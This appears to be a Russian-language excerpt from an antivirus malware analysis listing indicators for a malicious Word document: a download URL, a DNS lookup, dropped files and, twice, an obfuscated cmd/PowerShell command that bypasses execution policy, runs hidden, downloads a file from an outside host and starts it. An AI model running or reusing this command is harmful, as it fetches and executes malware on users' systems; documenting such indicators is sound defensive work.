Техническая информация
- http://unityrulesyur.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POwERSHElL.exe -EXEcUTiOnPOLICY bypass -nOprOFILE -winDOwSTyle HIDden (nEW-objEct SYstEm.Net.webClieNT).downloaDFiLE('http://unityrulesyur.top/search.php','%Appdata%.EXe');sTaRt-PROCE...
- %TEMP%\word\<Имя файла>.doc
- %TEMP%\word\<Имя файла>.doc
- DNS ASK un####ulesyur.top
- '<SYSTEM32>\cmd.exe' /C "POwERSHElL.exe -EXEcUTiOnPOLICY bypass -nOprOFILE -winDOwSTyle HIDden (nEW-objEct SYstEm.Net.webClieNT).downloaDFiLE('http://unityrulesyur.top/search.php','%Appdata%.EXe');sTaRt-PROCE...' (со скрытым окном)